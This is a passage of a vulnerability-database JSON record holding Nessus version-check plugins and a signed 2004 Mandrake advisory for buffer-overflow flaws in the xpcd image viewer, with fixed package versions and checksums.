value:\"http://www.debian.org/security/2003/dsa-368\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the stable distribution (woody) this problem has been fixed in\nversion 2.08-8woody1.\n\nWe recommend that you update your xpcd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xpcd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"xpcd\", reference:\"2.08-8woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xpcd-gimp\", reference:\"2.08-8woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xpcd-svga\", reference:\"2.08-8woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:21", "description": "A vulnerability in xpcd-svga, part of xpcd, was discovered by Jaguar.\nxpcd-svga uses svgalib to display graphics on the console and it would\ncopy user-supplied data of an arbitrary length into a fixed-size\nbuffer in the pcd_open function.\n\nAs well, Steve Kemp previously discovered a buffer overflow in\nxpcd-svga that could be triggered by a long HOME environment variable,\nwhich could be exploited by a local attacker to obtain root\nprivileges.\n\nThe updated packages resolve these vulnerabilities.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : xpcd (MDKSA-2004:053)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0402", "CVE-2003-0649"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:xpcd-gimp", "p-cpe:/a:mandriva:linux:xpcd", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "cpe:/o:mandrakesoft:mandrake_linux:9.2"], "id": "MANDRAKE_MDKSA-2004-053.NASL", "href": "https://www.tenable.com/plugins/nessus/14152", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:053. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14152);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0649\", \"CVE-2004-0402\");\n script_xref(name:\"MDKSA\", value:\"2004:053\");\n\n script_name(english:\"Mandrake Linux Security Advisory : xpcd (MDKSA-2004:053)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability in xpcd-svga, part of xpcd, was discovered by Jaguar.\nxpcd-svga uses svgalib to display graphics on the console and it would\ncopy user-supplied data of an arbitrary length into a fixed-size\nbuffer in the pcd_open function.\n\nAs well, Steve Kemp previously discovered a buffer overflow in\nxpcd-svga that could be triggered by a long HOME environment variable,\nwhich could be exploited by a local attacker to obtain root\nprivileges.\n\nThe updated packages resolve these vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xpcd and / or xpcd-gimp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xpcd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xpcd-gimp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"xpcd-2.08-20.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"xpcd-gimp-2.08-20.1.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"xpcd-2.08-20.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"xpcd-gimp-2.08-20.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0402", "CVE-2003-0649"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandrakelinux Security Update Advisory\r\n _______________________________________________________________________\r\n\r\n Package name: xpcd\r\n Advisory ID: MDKSA-2004:053\r\n Date: June 1st, 2004\r\n\r\n Affected versions: 10.0, 9.2\r\n ______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability in xpcd-svga, part of xpcd, was discovered by Jaguar.\r\n xpcd-svga uses svgalib to display graphics on the console and it\r\n would copy user-supplied data of an arbitrary length into a fixed-size\r\n buffer in the pcd_open function.\r\n \r\n As well, Steve Kemp previously discovered a buffer overflow in\r\n xpcd-svga that could be triggered by a long HOME environment variable,\r\n which could be exploited by a local attacker to obtain root\r\n privileges.\r\n \r\n The updated packages resolve these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0649\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0402\r\n ______________________________________________________________________\r\n\r\n Updated Packages:\r\n \r\n Mandrakelinux 10.0:\r\n 95c59861d1efef825ab730cba2691365 10.0/RPMS/xpcd-2.08-20.1.100mdk.i586.rpm\r\n 3114811e46e3a4b82e053894f153643d 10.0/RPMS/xpcd-gimp-2.08-20.1.100mdk.i586.rpm\r\n b3df76a539187146894f18d67a2967fd 10.0/SRPMS/xpcd-2.08-20.1.100mdk.src.rpm\r\n\r\n Mandrakelinux 10.0/AMD64:\r\n 50261e00a816e5621ce37d0f6320a941 amd64/10.0/RPMS/xpcd-2.08-20.1.100mdk.amd64.rpm\r\n 4362a1d3211af0c386aef08abfc74cc6 amd64/10.0/RPMS/xpcd-gimp-2.08-20.1.100mdk.amd64.rpm\r\n b3df76a539187146894f18d67a2967fd amd64/10.0/SRPMS/xpcd-2.08-20.1.100mdk.src.rpm\r\n\r\n Mandrakelinux 9.2:\r\n 907efca9e8de1fc9489755c919c51b8b 9.2/RPMS/xpcd-2.08-20.1.92mdk.i586.rpm\r\n 41078887e2d6bf60d376540653e997f7 9.2/RPMS/xpcd-gimp-2.08-20.1.92mdk.i586.rpm\r\n 9e2a2741fb7130324737a9262dbe8afb 9.2/SRPMS/xpcd-2.08-20.1.92mdk.src.rpm\r\n\r\n Mandrakelinux 9.2/AMD64:\r\n 4f434cc67c282744664a14e285b24e9e amd64/9.2/RPMS/xpcd-2.08-20.1.92mdk.amd64.rpm\r\n 7b6d9c0dfe83763823cc007f0956b173 amd64/9.2/RPMS/xpcd-gimp-2.08-20.1.92mdk.amd64.rpm\r\n 9e2a2741fb7130324737a9262dbe8afb amd64/9.2/SRPMS/xpcd-2.08-20.1.92mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrakeUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandrakesoft for security. You can obtain\r\n the GPG public key of the Mandrakelinux Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandrakelinux at:\r\n\r\n http://www.mandrakesoft.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n <security linux-mandrake.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFAvPvgmqjQ0CJFipgRAo8iAJ45Y7VU+B4FPBUwtbpjNyq8WJPA7wCgoVf+\r\n8St+6Ck5Tqq1iRjZpa9L/x4=\r\n=iwPf\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2004-06-03T00:00:00", "published": "2004-06-03T00:00:00", "id": "SECURITYVULNS:DOC:6285", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6285", "title": "MDKSA-2004:053 - Updated xpcd package fix vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
